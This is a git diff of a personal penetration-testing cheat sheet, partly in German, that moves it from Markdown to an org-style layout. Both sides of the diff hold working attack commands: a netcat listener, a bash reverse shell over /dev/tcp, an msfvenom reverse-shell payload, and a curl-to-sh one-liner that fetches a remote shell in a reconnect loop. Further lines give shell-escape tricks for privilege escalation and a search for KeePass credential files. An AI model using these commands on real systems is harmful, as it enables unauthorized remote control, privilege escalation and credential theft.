diff --git a/Cheatsheet.md b/Cheatsheet.md
index e541cda..b034611 100644
--- a/Cheatsheet.md
+++ b/Cheatsheet.md
@@ -1,200 +1,339 @@
-
-#### to install:
- - magic wormhole
- - tldr
- - rlwrap
- -
-```bash
-sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
-```
-#### for keyring
--> if there is some kind of keyring error
-```bash
-sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
-```
+
+# Table of Contents
+
+1. [information gathering](#org852ec36)
+ 1. [nmap](#orgda1065c)
+ 2. [dirb](#orgafbfb19)
+2. [inital access](#orgd5250d9)
+ 1. [start listener:](#orgefad80b)
+ 2. [reverse shell bash:](#org147daab)
+ 3. [reverse shell file:](#org32886e3)
+ 4. [untested:](#org6c097fc)
+3. [privilege escalation](#org6812526)
+ 1. [always run these:](#org0b25bb0)
+ 2. [TTY Spawn Shell](#org4152682)
+ 1. [Python spawn shell](#orgf659bfd)
+ 2. [OS system spawn shell](#org76c29ea)
+ 3. [Bash spawn shell](#org80d5744)
+ 4. [Perl spawn shell](#orgd4f31f3)
+ 5. [Ruby spawn shell](#org2fe4e07)
+ 6. [Lua spawn shell](#orgce64187)
+ 7. [IRB spawn shell](#org28402e0)
+ 8. [VI spawn shell](#org6bfa44c)
+ 9. [VI(2) spawn shell](#org4241f95)
+ 10. [Nmap spawn shell](#org5dc86b6)
+4. [Windows](#orgdcc9f31)
+ 1. [WinPEAS](#org21afc9d)
+ 2. [LOLBAS](#org08b790e)
+ 3. [WADCOMS](#orgb12dcff)
+ 4. [PrivescCheck Script as an alternative to WinPEAS](#org2bed5cd)
+ 5. [RUN these while the other scripts are working](#orgea4f773)
+ 6. [for finding kbdx Files](#org0f35200)
+
+1. to install:
+
+ - magic wormhole
+ - tldr
+ - rlwrap
+ -
+
+ sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
+
+2. for keyring
+
+ -> if there is some kind of keyring error
+
+ sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
+
+
+
# information gathering
+
+
+
### nmap
for quick scan of available ips
-```bash
-nmap -sn ip/24
-```
+
+ nmap -sn ip/24
+
to filter output for open ips
-```bash
-nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
-```
+ nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
scan open ports:
-```bash
-nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
-```
-#### bei windows
-```bash
-nmap --vuln ip
-```
-##### bei windows \+ smb
-```bash
-nmap --script vuln-smb* ip
-nicht mehr sicher welches es war
-nmap --script smb-vuln* ip
-```
+ nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
+
+
+
+
+### dirb
+
+ dirb http://ip
+
+1. bei windows
+
+ nmap --vuln ip
+
+ 1. bei windows \\+ smb
+
+ nmap --script smb-vuln* ip
+
+
+
# inital access
+
+
+
+
### start listener:
-```bash
-rlwrap -cAr nc -nlvp 9002
-```
+
+ rlwrap -cAr nc -nlvp 9002
+
+
+
+
### reverse shell bash:
-```bash
-/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
-```
+
+ /bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
+
+
+
+
### reverse shell file:
-```bash
-msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
-```
+
+ msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
+
-> from revshells.com
+
+
+
### untested:
- Reverse Shell as a Service
- 1. On your machine:
-```bash
- nc -l 1337
- or nlvp?
-```
+Reverse Shell as a Service
- 2. On the target machine:
-```bash
- curl https://reverse-shell.sh/yourip:1337 | sh
-```
+1. On your machine:
+
+ nc -l 1337
+ or nlvp?
+
+1. On the target machine:
+
+ curl https://reverse-shell.sh/yourip:1337 | sh
+
+1. reconnecting:
+
+ while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
-#### reconnecting:
-```bash
-while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
-```
+
# privilege escalation
-### always run these:
-```bash
-sudo -l
-```
-if sudo doesn't work:
-[[#^78d3ce|spawn shell]]
-#### check cronjobs
-```bash
-ls /etc/cron.*
-crontab -l
-```
+
+
+
+## always run these:
+
+ sudo -l
+
+if sudo doesn’t work:
+[3.2](#org4152682)
+
+1. check cronjobs
+
+ ls /etc/cron.*
+ crontab -l
+
+
+
## TTY Spawn Shell
-##### if sudo still doesn't work
-use
-```bash
-sudo -S command
-```
+1. if sudo still doesn’t work
+
+ use
+
+ sudo -S command
+
+ Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
+
+
+
-Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
### Python spawn shell
-```bash
-python -c 'import pty; pty.spawn("/bin/bash")'
-```
+ python -c 'import pty; pty.spawn("/bin/bash")'
+
Fully Interactive TTY
-#### All the steps to stabilize your shell
-**The first step:**
+1. All the steps to stabilize your shell
-```bash
-python3 -c 'import pty;pty.spawn("/bin/bash")'
-```
+ ****The first step:****
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
+
+ ****Step two is:****
+
+ export TERM=xterm
+
+ This will give us access to term commands such as clear.
+
+ ****Finally (and most importantly) we will background the shell using****
+
+ Ctrl + Z
+
+ Back in our own terminal we use
+
+ stty raw -echo; fg
+
+ This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
+
+ stty rows 38 columns 116
-Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
-
-**Step two is:**
-```bash
-export TERM=xterm
-```
+
-This will give us access to term commands such as clear.
-
-**Finally (and most importantly) we will background the shell using**
-
-```bash
-Ctrl + Z
-```
-
-Back in our own terminal we use
-
-```bash
-stty raw -echo; fg
-```
-
-This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
-
-```bash
-stty rows 38 columns 116
-```
### OS system spawn shell
-```bash
-echo os.system("/bin/bash")
-```
+ echo os.system("/bin/bash")
+
+
+
+
### Bash spawn shell
-```bash
-/bin/sh -i
-```
+ /bin/sh -i
+
+
+
+
### Perl spawn shell
-```bash
-perl —e 'exec "/bin/sh";'
-```
+ perl —e 'exec "/bin/sh";'
+
+
+
+
### Ruby spawn shell
-ruby: exec "/bin/sh"
+ruby: exec “/bin/sh”
+
+
+
### Lua spawn shell
-lua: os.execute("/bin/sh")
+lua: os.execute(“/bin/sh”)
+
+
+
### IRB spawn shell
-exec "/bin/sh"
+exec “/bin/sh”
+
+
+
### VI spawn shell
-```bash
-:!bash
-```
+ :!bash
+
+
+
+
### VI(2) spawn shell
-```bash
-:set shell=/bin/bash:shell
-```
+ :set shell=/bin/bash:shell
+
+
+
+
### Nmap spawn shell
-```bash
-!sh
-```
+ !sh
-#### Exiftools
+1. Exiftools
-Metadaten auslesen:
+ Metadaten auslesen:
+
+ exiftool picture.png
+
+ Binwalk (Binary Daten exportieren):
+
+ binwalk -e picture.png
-```bash
-exiftool picture.png
-```
-Binwalk (Binary Daten exportieren):
+
+
+# Windows
+
+
+
+
+### WinPEAS
+
+
+
+
+
+
+### LOLBAS
+
+#
+
+
+
+
+### WADCOMS
+
+
+
+
+
+
+### PrivescCheck Script as an alternative to WinPEAS
+
+
+
+
+
+
+### RUN these while the other scripts are working
+
+ whoami /priv
+
+ whoami /all
+
+ schtasks /query
+
+
+
+
+### for finding kbdx Files
+
+
+
+ Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
+
+quick Wins Linux:
+gdb -nx -ex ’!sh’ -ex quit
+sudo mysql -e ’! /bin/sh’
+strace -o /dev/null /bin/sh
+sudo awk ’BEGIN {system(“/bin/sh”)}’
+
+evilwinrm
+quick Wins Linux:
+gdb -nx -ex ’!sh’ -ex quit
+sudo mysql -e ’! /bin/sh’
+strace -o /dev/null /bin/sh
+sudo awk ’BEGIN {system(“/bin/sh”)}’
-```bash
-binwalk -e picture.png
-```